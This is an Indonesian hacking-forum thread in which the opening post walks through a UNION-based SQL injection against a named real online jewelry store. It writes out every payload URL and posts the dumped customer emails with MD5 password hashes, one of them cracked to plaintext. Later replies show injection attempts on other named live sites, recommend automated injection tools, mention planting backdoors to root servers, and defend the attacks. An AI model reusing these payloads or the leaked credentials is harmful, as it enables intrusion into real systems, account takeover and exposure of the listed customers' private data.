We Are DevilzCrew
 
IndeksPendaftaranLogin

Share | 
 

 sql injection ku...

Topik sebelumnya Topik selanjutnya Go down 
Pilih halaman : 1, 2  Next
PengirimMessage
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: sql injection ku...   Thu Jun 04, 2009 1:38 am

wew...
sql injection...
lol! lol! lol! lol! lol! lol! lol!
dengan dork inurl:info.php?id

wew dapet situs jual perhiasan !
silent silent silent silent silent silent silent
ok
aku mulai
http://cgdijewelry.com/info.php?id=-6
wew ada error !
mencari dan menghitung jumlah table yang ada dalam databasenya…
dengan perintah -> order by

http://cgdijewelry.com/info.php?id=-6+order+by+1-- <-- gg ada error...
http://cgdijewelry.com/info.php?id=-6+order+by+2-- <-- gg ada error...
http://cgdijewelry.com/info.php?id=-6+order+by+3-- <-- ada error... !

berarti jumlah tabelnya ada 2 dalam database itu...

ok sekarang kita gabungin angka itu...
dengan perintah +union+select+1,2-- <- karena jumlahtabelnya ada 2 tadi...

http://cgdijewelry.com/info.php?id=-6+UNION+SELECT+1,2--

wew...
keluar dua"nya....!

kita check dulu databasenya pake versi berapa yach...
dengan perintah -> +UNION+SELECT+@@version,2--
atau -> +UNION+SELECT+version(),2--

http://cgdijewelry.com/info.php?id=-6+UNION+SELECT+version(),2--
atau
http://cgdijewelry.com/info.php?id=-6+UNION+SELECT+@@version,2--

hasil : 5.0.51a-log

ternyata versi 5 !
hehehehhehee..
aku beruntung....
king king king king king king king king king king king king

ok sekarang kita tampilkan table yg ada database itu...
dengan perintah table_name <- dimasukan pada angka yg keluar tadi...
perintah +from+information_schema.tables-- <- dimasukan setelah angka terakhir...

http://cgdijewelry.com/info.php?id=-6+UNION+SELECT+table_name,2+from+information_schema.tables--

keluar nama tabel -> CHARACTER_SETS

sekarang kita tampilkan semua isi dari table tersebut
perintah group_concat(table_name) <-- dimasukan pada salah satu angka yang keluar...
perintah +from+information_schema.tables+where+table_schema=database() <-- dimasukan setelah angka terakhir

http://cgdijewelry.com/info.php?id=-6+UNION+SELECT+group_concat(table_name),2+from+information_schema.tables+where+table_schema=database()--

yang keluar -> cc_basket,cc_basket_attr,cc_categories,cc_content,cc_download,cc_loginlog,cc_members,cc_members_old,cc_newsletters,cc_orders,cc_orders_products,cc_orders_products_attr,cc_products,cc_products_attr,cc_products_size,cc_setting,cc_user


hihihihihiiii...

pada tahap ini kamu wajib mengekstrak kata pada isi table menjadi hexadecimal
nah, ini alamat website yang bisa bantu kita...
http://www.swingnote.com/tools/texttohex.php
cc_members jadi hexa -> 63635f6d656d62657273

sekarang tinggal pilih isi dari table tersebut mana yang mau diliat...
sekarang kita liat isi dari cc_user....

perintah group_concat(column_name) <-- dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0x+hexatabel-- <-- dimasukan setelah angka terakhir

http://cgdijewelry.com/info.php?id=-6+UNION+SELECT+group_concat(column_name),2+from+information_schema.columns+where+table_name=0x63635f6d656d62657273--

yang keluar --> id,gender,firstname,lastname,customers_dob,email_address,telephone,fax,password,newsletter,company,street_address,city,street_address2,state,postcode,country,blnBillToShip,blnCreateAccount,ship_firstname,ship_lastname,ship_company,ship_street_address,ship_city,ship_street_address2,ship_state,ship_postcode,ship_country,ship_telephone,ship_f

sekarang kita munculkan apa yg tadi telah dikeluarkan dari table caranya :

dengan perintah concat_ws(0×3a,hasil isi column yg mau dikeluarkan) <-- dimasukin pada angka yang keluar
perintah +from+(nama table berasal) <-- dimasukan setelah angka terakhir

sekarang kita mau lihat isi kolom dari tabel cc_members

http://cgdijewelry.com/info.php?id=-6+UNION+SELECT+group_concat(email_address,0x3a,password),2+FROM+cc_members--

hasil : info@goldensection101.com:467d10098cbd121aa780f3c3eebff98b,mxteng@yahoo.com:8cf56d419702d38a852d246559383a22,CaliforniaGift@hotmail.com:8cf56d419702d38a852d246559383a22,jsmith@vintagejune.com:7862f8fc478e6fa3827cab9d537d1890,littleeurope1@sbcglobal.net:90c30c7e365cc05d8020c7b1664c7309,cxteng@yahoo.com:934307c5f6de137954bb0b5d7f18fa30,ellejadeyu@yahoo.com:c38b9ef1345c34f22632bed730a58678,jadebug18@comcast.net:8bbe5d6679fed0463083586e8be01d2a,desion11@126.com:a2e74f8d741c18df45a9a31387f91992,venusgiftscompany@sbcglobal.net:0998cfcdbadfefc51e5dd2662dea5cc6,unicofashion@att.net:8814f6c490f96dc55b0e5974c0ed8b80,manya_lady@yahoo.com:106cc37dc580e24e5eee6ba7a44a26de,nj_golds@hotmail.com:239bf582c108158bd06bb1255057e440,rebkatboutique@yahoo.com:10c83e6ed550e59c1c9d4a661d6c7c4b,grisha@caribrose.com:ab0d911143eaf1cdd895903ac9db80a2,je.west@comcast.net:a9d97570955fc4e9438775c1b109e12f,ragenter@cox.net:9e47215bd3e7385ef934493c03cd9f3e,global.market@rap.midco.net:4d7b922ed3e58e7c49497c64227836e7,may@villagallery.com:e19ea

wew ! password di encrypt pake md5...

http://www.md5decrypter.co.uk/ <-- rekomendasi dari spykit ! hehehehehheeee...

kita decrypt passwordnya mxteng@yahoo.com
8cf56d419702d38a852d246559383a22 =decrypt= 2161100

wew...
selesai...
tinggal login and belanja...
heheheheheheeee...
buat om peti = silahkan calon istrinya di belanjain...
wkkwkkwkkwkkk... lol! lol! lol! lol! lol! lol! lol!
Kembali Ke Atas Go down
kiddies
Asisten LAB
Asisten LAB
avatar

Jumlah posting : 135
Join date : 05.05.09

PostSubyek: Re: sql injection ku...   Thu Jun 04, 2009 2:28 am

keren kaka......hebat kaka yah......
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: sql injection ku...   Thu Jun 04, 2009 1:02 pm

wew...
khan kaka juga yang ngajarin...
lol! lol! lol! lol! lol! lol! lol! lol!
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Re: sql injection ku...   Thu Jun 11, 2009 10:17 am

Code:
http://www.bridalmobil.com/customer_testimonials.php?&testimonial_id=7+union+select+group_concat(table_name),2,3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--


Terus di apaain lagi ya kk biar dapet user sama pass ??
Coz ini versinya beda kk,,saya jadi bingung.

Tolong di share ya kk.
masih perlu banyak belajar saya dari para master sekalian.
study study study study study
Kembali Ke Atas Go down
3dh0
Pengunjung
Pengunjung
avatar

Jumlah posting : 4
Join date : 18.06.09

PostSubyek: Re: sql injection ku...   Thu Jun 18, 2009 1:27 am

kaka bagus juga nih ilmunya jocolor
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Banyak bgt...!!!   Thu Jun 18, 2009 2:48 am

Gila.....
affraid affraid affraid

Ternyata masih banyak bgt web yang sejenis yang bisa di injection.
Parah juga neh adminnya,,kan kasihan orang yg punya email kalo didalemnya banyak data penting.
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: sql injection ku...   Thu Jun 18, 2009 2:46 pm

kenapa kesian kaka ?
kalo gg ada orang seperti kita, kapan security akan di utamain ?
bagus cuma di deface....
kalo di root sama kita gimana hayo ?
lol! lol! lol! lol! lol! lol! lol! lol!
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Re: sql injection ku...   Thu Jun 18, 2009 3:34 pm

Waduh Saya ga ngerti tuh ngeroot....
Emang diapain kk master ???
Saya belum paham.
study study study study

Saya baru bisa SQL Injection aja,,itu juga baru bisa sedikit.
Smile Smile Smile Smile Smile Smile Smile Smile Smile Smile
Kembali Ke Atas Go down
7460
Pengunjung
Pengunjung


Jumlah posting : 19
Join date : 29.05.09

PostSubyek: Re: sql injection ku...   Thu Jun 18, 2009 11:48 pm

vhesckot wrote:
Waduh Saya ga ngerti tuh ngeroot....
Emang diapain kk master ???
Saya belum paham.
study study study study

Saya baru bisa SQL Injection aja,,itu juga baru bisa sedikit.
Smile Smile Smile Smile Smile Smile Smile Smile Smile Smile


iy nih,, root itu apa y??
ane masih newbie bgt nih..
lol! lol! lol! lol! lol! lol! lol! lol! lol! lol!
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 12:52 am

ngeroot itu menguasai atau mendapat akses tertinggi dalam suatu server atau komputer...
biasanya komputer target ini linux...
jadi, sebelum server memformat ulang komputer yang kita root,
maka kitalah user tertinggi komputer tersebut...
lol! lol! lol! lol!

sebelum kita melakukan rooting, biasanya kita menanam backdoor di server target...
dan menjalankan perintah lewat backdoor tersebut...
Cool Cool Cool Cool Cool Cool

ok pokoknya nanti kita bahas yah sama master" yang ada disini....
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 1:14 am

Waduh kk,,tau ga link yang membuat artikel tentang apa itu ngeroot dan caranya....
sekalian tentang backdoor juga kk.

Aku masih newbie bgt neh,,jadi lom tau apa2.
Thanks kk master.
cheers cheers cheers cheers
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 1:24 am

waduh...
kaka udah gg sabaran yah belajar ngeroot ?
bweheheheheheee....
sebenernya kalo mau ngeroot kita harus bisa tekhnik sqli,rfi,lfi,xss,phising dulu kaka....
dan juga mempelajari perintah" linux...
byar kita bisa menggunakan skill kita secara maksimal pada suatu target....
aku ajah masih belajar kaka....
jadi jangan loncat langsung yah kaka....
lol! lol! lol! lol! lol! lol! lol! lol! lol!

maav gg isa kasih taw linknya dulu...
coz, aku salah kalo aku langsung kasih taw linknya....
maav yah kaka...


Terakhir diubah oleh gunslinger_ tanggal Fri Jun 19, 2009 2:15 am, total 1 kali diubah
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 1:45 am

Iya kk,, makasih ya....
Aku sedikit2 udah ngerti neh tentang SQL Injection.
Apa lagi yg harus dipelajari kk ??

Mohon Bimbingannya ya kk.
study study study study

Mohon sharingnya.
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 2:23 am

sebenernya sqli juga ada banyak tehniknya...
gg ini ajah....
afro afro afro afro

tapi, coba sekarang kaka gunakan tools schemafuzz...
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 3:32 am

schemafuzz.py ga jalan kayaknya di kompi saya kk.
saya udah download phyton.
saya pake Vista.
masih ga ngerti saya kk.
heheheheeeeee
Smile Smile Smile Smile
Kembali Ke Atas Go down
7460
Pengunjung
Pengunjung


Jumlah posting : 19
Join date : 29.05.09

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 3:51 am

masa nggak jalan om??
jalanin nya di command promp..
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 4:21 am

makanya pakai ubuntu...
linux for human being....
wkkwkkwkkkwkk...
jadi promosi sih aku...
lol! lol! lol! lol! lol! lol! lol!
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 5:42 am

cheers cheers cheers cheers

Bisa kk ....
Pake schemafuzz.py dan darkjumper.py
Tapi sekarang yg jadi masalah koq scan url nya ga dapet2 ya....
Aku masih ga ngerti seh cara pakenya kk.
heheheeeeeeeeee
Smile Smile Smile Smile Smile Smile Smile

Mohon bimbingannya.
study study study study
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 9:49 am

wedew...
maksud kaka gimana niy ?
aku jadi bingung kaka?
Kembali Ke Atas Go down
7460
Pengunjung
Pengunjung


Jumlah posting : 19
Join date : 29.05.09

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 10:56 am

vhesckot wrote:
cheers cheers cheers cheers

Bisa kk ....
Pake schemafuzz.py dan darkjumper.py
Tapi sekarang yg jadi masalah koq scan url nya ga dapet2 ya....
Aku masih ga ngerti seh cara pakenya kk.
heheheeeeeeeeee
Smile Smile Smile Smile Smile Smile Smile

Mohon bimbingannya.
study study study study


coba cari target yg lain..
mungkin target yg anda gunain level securitynya agak bagus
Very Happy Very Happy Very Happy Very Happy

oia,, darkmysqli.py adalah update dari schemafuzz.py..
jadi, pkai darkmysqli.py aja dari pada schemafuzz.py..
lol! lol! lol! lol! lol! lol! lol!
Kembali Ke Atas Go down
rotlez
Pengunjung
Pengunjung
avatar

Jumlah posting : 30
Join date : 18.06.09
Age : 26
Lokasi : Bekasi yg panaZ..

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 11:11 am

mohon om n tante pencerahan nya ane cuma tes nda mau ngapa2 in coz site indo...


ane bisa cma mpe :[code]http://www.infopangandaran.com/info.php?do=detail&id=-2+order+by+5--

mohon kk2 sekalian pencerahan nya......

Smile Smile Smile
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 3:03 pm

7460 wrote:
vhesckot wrote:
cheers cheers cheers cheers

Bisa kk ....
Pake schemafuzz.py dan darkjumper.py
Tapi sekarang yg jadi masalah koq scan url nya ga dapet2 ya....
Aku masih ga ngerti seh cara pakenya kk.
heheheeeeeeeeee
Smile Smile Smile Smile Smile Smile Smile

Mohon bimbingannya.
study study study study


coba cari target yg lain..
mungkin target yg anda gunain level securitynya agak bagus
Very Happy Very Happy Very Happy Very Happy

oia,, darkmysqli.py adalah update dari schemafuzz.py..
jadi, pkai darkmysqli.py aja dari pada schemafuzz.py..
lol! lol! lol! lol! lol! lol! lol!


Makasih kk,,berguna banget neh buat saya.
Jadi tambah pengetahuan.
cheers cheers cheers cheers cheers
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: sql injection ku...   Fri Jun 19, 2009 8:37 pm

kaka hati" yah...
biasanya halaman yang tidak mengalami error sebenernya ada error...
misalnya : halaman yang tadinya ada tulisan jadi mendadak kosong
itu juga bugs kaka...
tapi di umpetin ajah sama adminnya...
kadang" errornya di taruh title bar lah...
di pojokan lah...
di bawah lah...
kadang juga suka di kantongin byar gg keliatan sama kaka...
tetap awas yah matanya terhadap bugs....
lol! lol! lol! lol! lol! lol!
Kembali Ke Atas Go down
mywisdom
Pengunjung
Pengunjung


Jumlah posting : 19
Join date : 24.05.09

PostSubyek: Re: sql injection ku...   Sat Jun 20, 2009 1:28 am

nah itu dia klo gak ada error biasanya krn ada error_reporting(0); (fungsi php utk gak mengatur tampilan error)

kalo 1 berarti akan ada error yg keluar (error_reporting(1)
kalo diset 0 berarti gak muncul error (error_reporting(0) )
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Re: sql injection ku...   Sat Jun 20, 2009 1:39 am

mywisdom wrote:
nah itu dia klo gak ada error biasanya krn ada error_reporting(0); (fungsi php utk gak mengatur tampilan error)

kalo 1 berarti akan ada error yg keluar (error_reporting(1)
kalo diset 0 berarti gak muncul error (error_reporting(0) )


Iya tuh kk,,kadang seperti itu.
aku sering begitu,,tapi karena aku ga ngerti jadi aku tinggal deh.
Laughing Laughing Laughing Laughing Laughing Laughing Laughing Laughing
Kembali Ke Atas Go down
Sponsored content




PostSubyek: Re: sql injection ku...   

Kembali Ke Atas Go down
 
sql injection ku...
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 2Pilih halaman : 1, 2  Next
 Similar topics
-
» Injection Open Loop vs Close Loop
» WATER INJECTION (WAI) FOR N250R
» N250 Fuel injection Kit PNP
» (Ask) Ninja 250 Injection vs. Carbu
» Knalpot R9 Ninja 250 Injection 2013

Permissions in this forum:Anda tidak dapat menjawab topik
Devilzc0de TeaM :: Computer :: Attacking-Web-
Navigasi: